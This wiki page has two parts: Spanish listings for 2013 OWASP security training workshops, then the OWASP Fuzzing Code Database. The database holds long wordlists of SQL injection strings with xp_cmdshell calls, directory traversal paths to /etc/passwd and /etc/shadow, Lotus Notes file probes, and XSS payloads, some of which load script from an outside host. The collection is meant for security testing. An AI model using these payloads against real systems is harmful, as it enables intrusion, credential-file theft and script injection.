| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''<br><br>

Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.

'''Perﬁl del orador'''

Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.<br>
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.<br>

'''Duracion:''' 8 horas

'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13urutrainingesapi HAGA CLIC AQUI!]'''<br>
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Cristian-borghello-P.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''OWASP para Pentesters'''

Los desarrolladores son una raza extraña. Los Pentesters viven en una burbuja. Este entrenamiento ayuda a los desarrolladores a conocer sobre seguridad en el desarrollo web y a los Pentesters a probar aplicaciones web de forma adecuada.

Orientado a desarrolladores, pentesters y personas relacionados con el ciclo de vida del desarrollo de software o sus pruebas de seguridad.

'''Nivel:''' Intermedio

'''Objetivos:'''

- Conocer OWASP Top 10 (quick summary)
- Aprender cómo comprobar cada vulnerabilidad desde el punto de vista del Desarrollador y del Pentester
- Conocer recomendaciones desde el punto de vista del Pentester
- Conocer recomendaciones desde el punto de vista del Desarrollador

'''Perfil del orador'''

Cristian F. Borghello, es Licenciado en Sistemas, desarrollador, Certified Information Systems Security Professional (CISSP) y Microsoft MVP Security (Most Valuable Professional). Actualmente es Director de Segu-Info y se desempeña como consultor independiente en Seguridad de la Información. Escribe para diversos medios especializados e investiga en forma independiente sobre Seguridad Informática y de la Información. Ha disertado se congresos y seminarios nacionales e internacionales sobre la temática. El interés por la Seguridad Informática y su investigación lo ha llevado a mantener este sitio: http://www.segu-info.com.ar/ Cristian es miembro del capítulo Buenos Aires de OWASP, asi como de los capítulos ISSA (Information Systems Security Association), CSA (Cloud Security Alliance) e ISC2 Argentina.

'''Duracion:''' 8 horas

'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13urutrainingpentest HAGA CLIC AQUI!]'''<br>
|-
| align="center" style="background: #4B0082;" colspan="2" | <span style="color:#ffffff">'''BUENOS AIRES - ARGENTINA'''</span>
|-
| style="width:20%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Fecha'''
| style="width:80%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Lugar'''
|-
| valign="middle" bgcolor="#dbdbf3" align="center" | Jueves 4 de abril de 2013
| valign="middle" bgcolor="#dbdbf3" align="left" | Globant - Oficina South Park - Humberto Primo 53 (esq. Av. Ing. Huergo), Ciudad de Buenos Aires
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Cerullof.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''<br><br>

Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.

'''Perﬁl del orador'''

Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.<br>
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.<br>

'''Duracion:''' 8 horas

'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13argtrainingesapi HAGA CLIC AQUI!]'''<br>

|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Cristian-borghello-P.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''OWASP para Pentesters'''

Los desarrolladores son una raza extraña. Los Pentesters viven en una burbuja. Este entrenamiento ayuda a los desarrolladores a conocer sobre seguridad en el desarrollo web y a los Pentesters a probar aplicaciones web de forma adecuada.

Orientado a desarrolladores, pentesters y personas relacionados con el ciclo de vida del desarrollo de software o sus pruebas de seguridad.

'''Nivel:''' Intermedio

'''Objetivos:'''

- Conocer OWASP Top 10 (quick summary)
- Aprender cómo comprobar cada vulnerabilidad desde el punto de vista del Desarrollador y del Pentester
- Conocer recomendaciones desde el punto de vista del Pentester
- Conocer recomendaciones desde el punto de vista del Desarrollador

'''Perfil del orador'''

Cristian F. Borghello, es Licenciado en Sistemas, desarrollador, Certified Information Systems Security Professional (CISSP) y Microsoft MVP Security (Most Valuable Professional). Actualmente es Director de Segu-Info y se desempeña como consultor independiente en Seguridad de la Información. Escribe para diversos medios especializados e investiga en forma independiente sobre Seguridad Informática y de la Información. Ha disertado se congresos y seminarios nacionales e internacionales sobre la temática. El interés por la Seguridad Informática y su investigación lo ha llevado a mantener este sitio: http://www.segu-info.com.ar/ Cristian es miembro del capítulo Buenos Aires de OWASP, asi como de los capítulos ISSA (Information Systems Security Association), CSA (Cloud Security Alliance) e ISC2 Argentina.

'''Duracion:''' 8 horas

'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13argtrainingpentest HAGA CLIC AQUI!]'''<br>

|}
<br>
{|style="vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;" align="center" cellspacing="5"
|-
|}

2010-02-04T02:30:53Z

Wagner.elias:

Category:OWASP Fuzzing Code Database

2010-02-02T17:25:51Z

Wagner.elias:

This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.
Please add your own statements and check out the statements already added.

==== News ====

'''02 February 2010''''

* Created new Category Lotus/Notes Files

'''11 August 2009'''

* Created new Category: XML Attacks

''Update Statements''

* 15 new XML Statements
* 93 new SQL Injections Statements
* 67 new Traversal Directory Statements
* Delete 33 XSS Statement Duplicate
* 30 New XSS Statements

'''7 August 2009'''

* Updated the objectives of the project.

'''21 July 2009'''

* Set the team responsible for the project.

==== Goals ====

This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.

In addition, the following functionalities will be included on this project:

1 - The statements of ASDR Project
2 - Browser
3 - Operational System
4 - Databases

An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:

1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.

2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.

3 - Possibility to support users on the report of their own experiences with the statements.

==== Statements ====

=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===

<pre>
/852566C90012664F
/admin4.nsf
/admin5.nsf
/admin.nsf
/agentrunner.nsf
/alog.nsf
/a_domlog.nsf
/bookmark.nsf
/busytime.nsf
/catalog.nsf
/certa.nsf
/certlog.nsf
/certsrv.nsf
/chatlog.nsf
/clbusy.nsf
/cldbdir.nsf
/clusta4.nsf
/collect4.nsf
/da.nsf
/dba4.nsf
/dclf.nsf
/DEASAppDesign.nsf
/DEASLog01.nsf
/DEASLog02.nsf
/DEASLog03.nsf
/DEASLog04.nsf
/DEASLog05.nsf
/DEASLog.nsf
/decsadm.nsf
/decslog.nsf
/DEESAdmin.nsf
/dirassist.nsf
/doladmin.nsf
/domadmin.nsf
/domcfg.nsf
/domguide.nsf
/domlog.nsf
/dspug.nsf
/events4.nsf
/events5.nsf
/events.nsf
/event.nsf
/homepage.nsf
/iNotes/Forms5.nsf/$DefaultNav
/jotter.nsf
/leiadm.nsf
/leilog.nsf
/leivlt.nsf
/log4a.nsf
/log.nsf
/l_domlog.nsf
/mab.nsf
/mail10.box
/mail1.box
/mail2.box
/mail3.box
/mail4.box
/mail5.box
/mail6.box
/mail7.box
/mail8.box
/mail9.box
/mail.box
/msdwda.nsf
/mtatbls.nsf
/mtstore.nsf
/names.nsf
/nntppost.nsf
/nntp/nd000001.nsf
/nntp/nd000002.nsf
/nntp/nd000003.nsf
/ntsync45.nsf
/perweb.nsf
/qpadmin.nsf
/quickplace/quickplace/main.nsf
/reports.nsf
/sample/siregw46.nsf
/schema50.nsf
/setupweb.nsf
/setup.nsf
/smbcfg.nsf
/smconf.nsf
/smency.nsf
/smhelp.nsf
/smmsg.nsf
/smquar.nsf
/smsolar.nsf
/smtime.nsf
/smtpibwq.nsf
/smtpobwq.nsf
/smtp.box
/smtp.nsf
/smvlog.nsf
/srvnam.htm
/statmail.nsf
/statrep.nsf
/stauths.nsf
/stautht.nsf
/stconfig.nsf
/stconf.nsf
/stdnaset.nsf
/stdomino.nsf
/stlog.nsf
/streg.nsf
/stsrc.nsf
/userreg.nsf
/vpuserinfo.nsf
/webadmin.nsf
/web.nsf
/.nsf/../winnt/win.ini
/?Open
</pre>

=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===

<pre>
Statement
'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
"a"" or 1=1--"
or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)
a'
?
' or 1=1
‘ or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
or 1=1 or ""=
' or a=a--
or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
'%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
‘ or 3=3 --
</pre>

=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===

<pre>
<br/>
<br/>
<br/>
<br/>
</pre>

=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===

<pre>
Statement
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\'/bin/cat%20/etc/passwd\\'
\\'/bin/cat%20/etc/shadow\\'
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
</pre>
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''

=== XSS Statements - Most effective/most common statements ===

Testing Statements
<pre>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
</pre>

Common exploit code (covers a lot of XSS vulnerabilities)
<pre>
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
</pre>

=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)

<pre>
Statements
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
"<IMG SRC=""javascript:alert('XSS');"">"
<IMG SRC=JaVaScRiPt:alert('XSS')>
"<IMG SRC=javascript:alert(""XSS"")>"
"<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>"
"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">"
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
"<IMG SRC=""jav"
"ascript:alert('XSS');"">"
"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out"
"perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out"
"<IMG SRC=""  javascript:alert('XSS');"">"
"<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>"
"<SCRIPT/SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<<SCRIPT>alert(""XSS"");//<</SCRIPT>"
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
"<IMG SRC=""javascript:alert('XSS')"""
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>
"\"";alert('XSS');//"
"</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>"
"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">"
"<BODY BACKGROUND=""javascript:alert('XSS')"">"
<BODY ONLOAD=alert('XSS')>
"<IMG DYNSRC=""javascript:alert('XSS')"">"
"<IMG LOWSRC=""javascript:alert('XSS')"">"
"<BGSOUND SRC=""javascript:alert('XSS');"">"
"<BR SIZE=""&{alert('XSS')}"">"
"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>"
"<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">"
"<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">"
"<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>"
"<XSS STYLE=""behavior: url(xss.htc);"">"
"<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS"
"<IMG SRC='vbscript:msgbox(""XSS"")'>"
¼script¾alert(¢XSS¢)¼/script¾
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">"
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
"<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>"
"<TABLE BACKGROUND=""javascript:alert('XSS')"">"
"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
"<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
